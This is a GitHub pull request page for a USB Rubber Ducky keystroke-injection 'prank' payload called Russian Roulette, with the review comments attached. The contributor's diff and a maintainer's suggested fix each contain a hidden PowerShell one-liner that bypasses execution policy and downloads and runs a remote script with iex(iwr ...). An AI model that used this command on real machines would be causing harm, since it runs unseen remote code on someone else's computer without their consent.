Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Added Russian Roulette #515

Open
wants to merge 5 commits into
base: master
Choose a base branch
from
Open

Conversation

Phishing-Tides
Copy link

What does it do: User is forced to play a game of Russian Roulette
How can people use this payload: This payload can be used to prank friends into thinking that a virus will be installed on their computer if they don't win. It's also fun to see them react when they don't win the game and are rewarded with a rickroll for losing.

This payload forces the user to play a game of Russian Roulette
REM Version: 1.0
REM Category: Prank
REM Source: https://github.com/Phishing-Tides/Hak5_RubberDucky_Payloads

Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

If your payload is designed to target windows, please consider using the PASSIVE_WINDOWS_DETECT extension this allows for the USB rubber ducky to dynamically detect when the target is accepting keystroke removing the need for a long start delay

DELAY 500
DELETE
DELAY 100
STRING powershell -w h -NoP -NonI -Exec Bypass -Command "Start-Process powershell -ArgumentList '-NoP -NonI -Exec Bypass -w h -Command iex (iwr https://raw.githubusercontent.com/Thomas-Tubinas/Hak5/refs/heads/main/russianroulette.ps1?dl=1)' -WindowStyle Hidden"
Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Please read https://github.com/hak5/usbrubberducky-payloads?tab=readme-ov-file#staged-payloads

Staged payloads are not allowed. Please include the source code for the ps1 file inside of your PR and include a notice that the user is required to host the file.

Include the script in the directory with your payload
Provide instructions for the user to move the script to the appropriate hosting service.
Provide a DEFINE with the placeholder example.com for the user to easily configure once they have hosted the script

DEFINE #URL example.com/ps1 

STRINGLN powershell -w h -NoP -NonI -Exec Bypass -Command "Start-Process powershell -ArgumentList '-NoP -NonI -Exec Bypass -w h -Command iex (iwr #URL)' -WindowStyle Hidden"

payloads/library/prank/-RD-Russian-Roulette/payload.txt Outdated Show resolved Hide resolved
@hak5peaks hak5peaks added the pending requested changes requires changes before merge label Feb 6, 2025
Added PowerShell script that runs on the rubber ducky
Added Passive Windows Detect to Payload
@Phishing-Tides
Copy link
Author

I went back and made some changes to the pr. please let me know if i missed anything.

Copy link
Author

@Phishing-Tides Phishing-Tides left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I went back and made some changes to the pr. please let me know if i missed anything.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
pending requested changes requires changes before merge
Projects
None yet
Development

Successfully merging this pull request may close these issues.

2 participants